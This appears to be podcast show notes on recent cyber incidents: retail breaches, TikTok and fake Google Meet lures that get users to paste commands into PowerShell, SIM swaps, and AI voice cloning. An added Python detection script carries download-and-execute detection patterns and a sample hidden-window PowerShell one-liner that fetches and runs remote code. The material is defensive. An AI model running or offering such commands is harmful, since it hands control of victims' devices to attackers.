Jun 2, 2025
These Old Cyber Tricks STILL Work?

What do Victoria’s Secret, TikTok, and a Scottish train station have in common?
They all feature in this week’s episode—alongside malware, fake IT calls, and a growing pile of breached data.

Episode 31 is full of weird, worrying, and very real cyber stories. Retailers are still getting hit. TikTok is spreading malware using AI-generated videos. SIM swap attacks are back. And a voice actor says her voice was cloned by ScotRail without permission. There's also a bit of good news—Microsoft and Apple are making some smart software updates that might actually help.

Let’s break it all down…

🛍️ Victoria’s Secret and Adidas – Different Attacks, Same Worry
Victoria’s Secret pulled down its entire US website after a security incident. Stores are still open, and the UK site is fine, but details are scarce. Meanwhile, Adidas confirmed that customer contact info was stolen via a third-party help desk. No credit cards were taken, but attackers now have names and email addresses—perfect for phishing.

The bigger trend? Help desks being socially engineered to reset passwords or provide access. It’s the same pattern we saw with MGM, M&S, and others. Social engineering is winning because it’s fast and it works. You don’t need zero-days when you can just ask someone nicely.

🎣 AI-Generated TikToks Are Now Spreading Malware
In a particularly grim twist, we found out this week that attackers are using TikTok to distribute info-stealing malware. The videos show fake software tips like “activate Microsoft Office” or “get Spotify Premium for free”—but they’re actually convincing users to open PowerShell and paste in malicious code.

One of these videos racked up half a million views.

This isn’t phishing in the traditional sense. There’s no dodgy link or email. Just a fake video and a bit of social engineering that hits people’s curiosity and FOMO. It’s especially dangerous on BYOD devices—because what gets installed at home could end up back on the corporate network.

📞 Google Meet Scam – Same Trick, New Platform
We also spotted a fake Google Meet error message asking users to “fix” their microphone by pressing Win+R and pasting in a command. It looks like Google Meet, but it’s a full clone, and the code gets copied to the clipboard automatically. You barely have to think. Just press, paste, and enter. And just like that, someone else has control of your device.

Same goes for fake Cloudflare verifications targeting WordPress admins and even a Coursera-themed phishing campaign that leads to a fake Facebook login page. It's all part of a wider trend: fewer links, more human behaviour tricks.

The lesson? If a webpage tells you to open PowerShell or press Win+R, don’t do it. Ever.
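For the security team rather than the end user, the TikTok and Google Meet stories above share one detectable shape: a shell launched from the Run dialog or desktop (parent process explorer.exe) with a command line that downloads and executes something, hides its window, or bypasses execution policy. The Python below is an added example, not code from the episode or from any of the outlets linked in the notes. It scores constructed process-creation records in the style of Sysmon Event ID 1 / Windows 4688; the field names, sample command lines, the example.invalid URL and the threshold are all assumptions for illustration, and a real deployment would tune them against its own telemetry.

```python
"""Score process-creation records for the 'paste this into Win+R / PowerShell' pattern.

Added example with constructed telemetry; not part of the original show notes.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str
    user: str


# Download-and-execute keywords typical of paste-and-run one-liners.
DOWNLOAD_EXEC = re.compile(
    r"\b(iwr|invoke-webrequest|iex|invoke-expression|downloadstring|curl|wget)\b", re.I)

# Switches used to hide the window, pass encoded commands, or skip policy/profile.
HIDE_OR_BYPASS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(ncodedcommand|nc|c)\b|-ep\s+bypass"
    r"|-executionpolicy\s+bypass|-nop\b|-noprofile)", re.I)

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
# The Win+R Run box starts its child under explorer.exe, as does a desktop shortcut.
INTERACTIVE_PARENTS = ("explorer.exe",)


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Non-shell images score 0 immediately."""
    reasons: list[str] = []
    score = 0
    image = ev.image.lower().rsplit("\\", 1)[-1]
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    if image not in SHELLS:
        return 0, reasons
    if parent in INTERACTIVE_PARENTS:
        score += 1
        reasons.append(f"shell spawned by {parent} (Run dialog / desktop)")
    if DOWNLOAD_EXEC.search(ev.command_line):
        score += 2
        reasons.append("download-and-execute keyword in command line")
    if HIDE_OR_BYPASS.search(ev.command_line):
        score += 2
        reasons.append("window-hiding, encoding or policy-bypass switch")
    return score, reasons


def find_suspicious(events, threshold: int = 3):
    """Keep only events at or above the threshold; a bare interactive launch alone is not enough."""
    hits = []
    for ev in events:
        score, why = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, why))
    return hits


# Constructed sample records (hypothetical; the URL is a reserved .invalid placeholder).
SAMPLE_EVENTS = [
    ProcessEvent(  # victim pasted a fake "fix your microphone" command into Win+R
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Windows\explorer.exe",
        'powershell -w hidden -c "iwr http://example.invalid/x | iex"',
        "CORP\\alice"),
    ProcessEvent(  # admin opening an interactive PowerShell window from Run: benign
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Windows\explorer.exe",
        '"powershell.exe"',
        "CORP\\bob"),
    ProcessEvent(  # scheduled maintenance script under svchost: benign, no interactive parent
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Windows\System32\svchost.exe",
        r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
        "NT AUTHORITY\\SYSTEM"),
    ProcessEvent(  # unrelated process, ignored entirely
        r"C:\Windows\System32\notepad.exe",
        r"C:\Windows\explorer.exe",
        "notepad.exe notes.txt",
        "CORP\\alice"),
]

if __name__ == "__main__":
    for ev, score, why in find_suspicious(SAMPLE_EVENTS):
        print(f"[score {score}] {ev.user}: {ev.command_line}")
        for reason in why:
            print(f"    - {reason}")
```

The scoring is deliberately additive: a shell under explorer.exe is normal for administrators, and a scheduled script with -NoProfile is normal for automation, so neither reaches the threshold on its own. Only the combination seen in the paste-and-run lure crosses it, which keeps the rule useful without flooding the queue. Pairing the alert with the RunMRU history in the user's registry hive confirms whether the command came through the Run box.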

🔄 SIM Swap Scams Are Back (And Still Working)
This story came in from a listener—Oli spotted that someone he knows had been SIM swapped. They got a legitimate-looking message from EE confirming a new eSIM had been ordered, then a flurry of calls from an unknown number. They called EE, and yep—it had happened. Their mobile number had been reassigned, and SMS-based logins were no longer theirs.

It’s easy to forget just how much is tied to your phone number. SMS codes. Banking apps. Password resets. All it takes is one help desk that doesn’t ask the right questions. We talk about whether mobile providers should let users lock their SIM from porting—and why EE’s current process is nowhere near good enough.

🧠 The Awareness Angle – Tell People What’s Not Normal
This week’s awareness messaging is simple:
If a website or video asks you to open Run (Win+R), PowerShell, or paste in a command—walk away. It’s not normal. It’s never okay. Your IT team will never ask you to do this.

The same goes for weird login pages, especially if they’re offering something free, urgent, or exclusive. Encourage your users to pause and check before entering credentials or following instructions.

🎙️ ScotRail Voice Controversy – AI and Consent
Voice actor Gayanne Potter recorded some lines for accessibility tools back in 2021. This year, she discovered her voice had been turned into “Iona”—the new voice of ScotRail. She never gave permission for that. She’s spent two years trying to get it removed.

It’s a real-world version of the video we made last year—Likeness. It’s about how easily your identity can be used by an AI system once you've signed the wrong contract or clicked "agree" without reading. There’s currently no legal protection in the UK for voice or likeness. GDPR might not even apply if the company owns the original recordings.

This one’s a wake-up call for anyone working with audio, video, or their face and name online. Creators deserve more protection. And organisations using AI need to be upfront about how and why they’re doing it.

💰 Would You Sell Your Data for £40 a Month? Gen Z Might.
A new app called Verb.AI is paying Gen Zers $50 a month to track their scrolling, clicking, and buying. It builds a “digital twin” that companies can query like a chatbot to understand habits and preferences. It’s being sold as a fair value exchange. But is it?

Apparently, 88% of Gen Z are okay with sharing personal data if there’s compensation. And yet they’re also more likely than older generations to use encrypted messaging, block cookies, and browse privately. There's a tension here between knowing the risks and doing it anyway. And it’s something awareness teams need to understand.

The takeaway? Awareness isn’t just about teaching risk—it’s about helping people care. Especially when short-term rewards (like £40 a month) seem more tangible than long-term data consequences.

🔄 Smaller Bits Worth Your Time

  • WhatsApp is now offering passkey support for login—so you can ditch SMS codes and use fingerprint or face unlock instead.

  • Microsoft is building a new update orchestrator that will automatically patch all your drivers, apps, and system components in one go.

  • Apple’s switching to year-based naming for their OS updates—iOS 26, macOS 26, and so on—alongside a full redesign coming at WWDC.

🧠 The Awareness Angle – This Week’s Takeaways

Don’t Run Commands from Random Websites
That might sound obvious to security folks, but if TikTok videos and fake error messages are convincing thousands of people to paste code into PowerShell, we’ve still got work to do.

Tell Better Help Desk Stories
Attackers are getting in by calling IT. Seriously. The same way someone could walk into McDonald’s wearing a uniform and say “I work here now.” Teach your people to question unexpected requests, even from inside.

People Care About People, Not Protocols
£300 million lost. A cloned voice. A password on a post-it note. These are the kinds of details that stick. So make sure your awareness stories are human—not just technical.

🎙️ Quick Plugs

We’re up for Best Newcomer and Back to Basics at the European Cybersecurity Blogger Awards 2025. Results announced Wednesday 5th June at InfoSec Europe. Ant will be there—say hi if you’re around!

Don’t Miss It!
Our Awareness Angle Interview with Sara Carty from Unboring is out on Thursday.
It’s full of honest chat about drama school, storytelling, cyber marketing, and why we need to ditch blue, padlocks, and hoodie stock images.

Listen back—this one’s got loads for awareness pros.

📉 Victoria’s Secret Breach
Watch – https://youtu.be/XgogrdK_NvU?t=149
Read – https://www.bbc.co.uk/news/business-69081682

👟 Adidas Helpdesk Cyber Attack
Watch – https://youtu.be/XgogrdK_NvU?t=190
Read – https://www.bbc.co.uk/news/technology-69073785

📹 TikTok Malware via PowerShell Commands
Watch – https://youtu.be/XgogrdK_NvU?t=384
Read – https://www.infosecurity-magazine.com/news/ai-tiktok-infostealer-malware/

🪟 Microsoft’s Unified Update System
Watch – https://youtu.be/XgogrdK_NvU?t=523
Read – https://www.windowscentral.com/software-apps/windows-11/microsoft-is-working-on-a-unified-update-platform-to-keep-your-pc-up-to-date

🍎 Apple OS Rename: iOS 26 and macOS 26
Watch – https://youtu.be/XgogrdK_NvU?t=723
Read – https://9to5mac.com/2025/05/28/ios-26-name-change/

📄 Tajikistan Targeted via Word Macros
Watch – https://youtu.be/XgogrdK_NvU?t=847
Read – https://www.bleepingcomputer.com/news/security/russia-aligned-tag-110-targets-tajikistan-with-dotm-files/

☁️ Fake Cloudflare Verification Scam
Watch – https://youtu.be/XgogrdK_NvU?t=996
Read – https://www.wordfence.com/blog/2025/05/fake-cloudflare-page-malware/

🎥 Fake Google Meet PowerShell Attack
Watch – https://youtu.be/XgogrdK_NvU?t=1080
Read – https://www.cyware.com/news/new-phishing-scam-fake-google-meet-page-tricks-users-into-running-malware-67df4f27

🎓 Coursera/Meta Phishing Scam
Watch – https://youtu.be/XgogrdK_NvU?t=1214
Read – https://cofense.com/blog/fake-meta-certificates-coursera-phishing-campaign/

📱 SIM Swap Attack on EE
Watch – https://youtu.be/XgogrdK_NvU?t=2490
Read – https://community.ee.co.uk/t5/Mobile-Services/SIM-Swap-Scam-warning/m-p/1317527

💵 Gen Z Selling Their Data for $50/month
Watch – https://youtu.be/XgogrdK_NvU?t=2880
Read – https://www.fastcompany.com/91134124/gen-z-selling-personal-data-verb-app

🎙️ ScotRail AI Voice Controversy
Watch – https://youtu.be/XgogrdK_NvU?t=3133
Read – https://www.bbc.co.uk/news/uk-scotland-69085678

📜 T&Cs Tool – TOSDR.org
Watch – https://youtu.be/XgogrdK_NvU?t=3505
Read – https://tosdr.org/

🔐 WhatsApp Adds Passkey Support
Watch – https://youtu.be/XgogrdK_NvU?t=3660
Read – https://www.whatsapp.com/blog/passkeys-on-android

📧 Phishing Email Spoofing Luke
Watch – https://youtu.be/XgogrdK_NvU?t=3773
